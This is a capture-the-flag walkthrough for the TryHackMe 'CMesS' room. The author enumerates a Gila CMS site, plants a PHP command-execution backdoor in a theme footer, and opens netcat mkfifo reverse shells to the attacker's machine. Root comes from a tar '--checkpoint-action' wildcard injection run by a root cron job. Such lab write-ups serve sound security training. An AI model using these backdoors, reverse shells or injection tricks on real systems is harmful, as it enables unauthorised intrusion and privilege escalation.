TryHackMe: CMeSS by optional

Please add MACHINE_IP cmess.thm to /etc/hosts

Please also note that this box does not require brute forcing!

Enumeration

As directed let's add cmess.thm to /etc/hosts and run rustscan

╰─⠠⠡ rustscan -a cmess.thm --ulimit 10000 -- -sC -sV -oA cmess -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.91.111:22
Open 10.10.91.111:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-04 23:16 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
Initiating Ping Scan at 23:16
Scanning 10.10.91.111 [2 ports]
Completed Ping Scan at 23:16, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 23:16
Scanning cmess (10.10.91.111) [2 ports]
Discovered open port 80/tcp on 10.10.91.111
Discovered open port 22/tcp on 10.10.91.111
Completed Connect Scan at 23:16, 0.04s elapsed (2 total ports)
Initiating Service scan at 23:16
Scanning 2 services on cmess (10.10.91.111)
Completed Service scan at 23:16, 6.48s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.91.111.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 1.41s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.14s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
Nmap scan report for cmess (10.10.91.111)
Host is up, received syn-ack (0.035s latency).
Scanned at 2021-04-04 23:16:38 BST for 8s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCvfxduhH7oHBPaAYuN66Mf6eL6AJVYqiFAh6Z0gBpD08k+pzxZDtbA3cdniBw3+DHe/uKizsF0vcAqoy8jHEXOOdsOmJEqYXjLJSayzjnPwFcuaVaKOjrlmWIKv6zwurudO9kJjylYksl0F/mRT6ou1+UtE2K7lDDiy4H3CkBZALJvA0q1CNc53sokAUsf5eEh8/t8oL+QWyVhtcbIcRcqUDZ68UcsTd7K7Q1+GbxNa3wftE0xKZ+63nZCVz7AFEfYF++glFsHj5VH2vF+dJMTkV0jB9hpouKPGYmxJK3DjHbHk5jN9KERahvqQhVTYSy2noh9CBuCYv7fE2DsuDIF
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGOVQ0bHJHx9Dpyf9yscggpEywarn6ZXqgKs1UidXeQqyC765WpF63FHmeFP10e8Vd3HTdT3d/T8Nk3Ojt8mbds=
|   256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFUGmaB6zNbqDfDaG52mR3Ku2wYe1jZX/x57d94nxxkC
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:16
Completed NSE at 23:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds

22/ssh

No credentials so let's move on.

80/http

80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/

Ok so we have a website using Gila CMS, trying /admin we get the admin login

Compromise this machine and obtain user.txt

Ok, so let's check exploit-db for Gila CMS

We see we have Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated) so let's try that.

Didn't work :( , tried this and a few other things but didn't get anywhere so looked at the hint.

Question Hint
Have you tried fuzzing for subdomains?

After reading that I use wfuzz to find sub-domains.

╰─⠠⠡ 
wfuzz -c -f subdomains.txt -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hl 107  
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://cmess.thm/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                   
===================================================================

0000xxxxx:   200        30 L     104 W    934 Ch      "[REDACTED]"                                                                                                     

Total time: 26.24969
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 190.3641

Here we find the subdomain, so lets add to /etc/hosts and browse to it.

Using the credentials from this page we are able to login.

From here we can edit the current theme and add some code to get Remote Code Execution, here I have used the footer.

So if we visit http://cmess.thm/?cmd=id we see

To get a remote shell I add the below to footer.php

if ( isset($_GET[shell]) ){
  exec ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc tun0 4444 >/tmp/f ");
}

Then going to http://cmess.thm/?shell=1 we get a shell back.

╰─○ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.91.111 39290
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cmess:/var/www/html$ export TERM=xterm
export TERM=xterm
www-data@cmess:/var/www/html$ ^Z
[1]  + 79952 suspended  nc -lvnp 4444

╰─○ stty raw -echo; fg

[1]  + 79952 continued  nc -lvnp 4444

www-data@cmess:/var/www/html$ 
www-data@cmess:/var/www/html$ 

We don't have access to /home/... so looking around the filesystem we find /tmp/andre_backup.tar.gz, lets have a look at whats inside.

www-data@cmess:/var/www$ tar -tzf /tmp/andre_backup.tar.gz 
note

We have a note so let's extract and take a look

www-data@cmess:/tmp$ tar zxf andre_backup.tar.gz 
www-data@cmess:/tmp$ cat note 
Note to self.
Anything in here will be backed up! 

Ok, so looks like we have a backup running of /tmp, doing our usual tar exploit below does not bring back a shell

echo > '--checkpoint=1'
echo > '--checkpoint-action=exec=sh shell.sh'

Let's grab linPEAS and take a look. Looking at the output it looks like that the tar exploit will get us root later on.

*/2 * * * * root cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *

But back to getting the user flag....

[+] Searching docker files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket
-rwxrwxrwx 1 root root 639 Jul 10  2019 /var/www/html/Dockerfile

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/dev/shm/shell.sh
/opt/.password.bak
/run/lock
/run/lock/apache2
/run/php
/tmp
/tmp/--checkpoint-action=exec=sh shell.sh
/tmp/--checkpoint=1
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
#)You_can_write_even_more_files_inside_last_directory

/opt/.password.bak looks interesting, looking inside it we get the users password.

$ cat /opt/.password.bak 
andres backup password
[REDACTED]

This allows us to login over ssh and get the user.txt

╰─○ ssh andre@cmess
The authenticity of host 'cmess (10.10.91.111)' can't be established.
ECDSA key fingerprint is SHA256:sWfTNeZtMkhHDii33U60/cvVhAonkgxNTMtJ+KYQ7bI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cmess,10.10.91.111' (ECDSA) to the list of known hosts.
andre@cmess's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Thu Feb 13 15:02:43 2020 from 10.0.0.20
andre@cmess:~$ cat user.txt 
thm{[REDACTED]}

Root Flag

We stumbled upon this when looking to escalate to andre so let's jump into backup/ and use our tar exploit.

andre@cmess:~$ cd backup/
andre@cmess:~/backup$ echo '#!/bin/bash' > shell.sh
andre@cmess:~/backup$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc tun0 5555 >/tmp/f ' > shell.sh
andre@cmess:~/backup$ echo > '--checkpoint=1'
andre@cmess:~/backup$ echo > '--checkpoint-action=exec=sh shell.sh'

We start our listener, wait for the cron to run and we get a shell back which can use to read our root.txt

╰─○ nc -lvnp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.91.111 37604
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
thm{[REDACTED]}
# 

Done

A nice little room with some sub domain enumeration. Jumped the gun a bit on the privesc but got there in the end.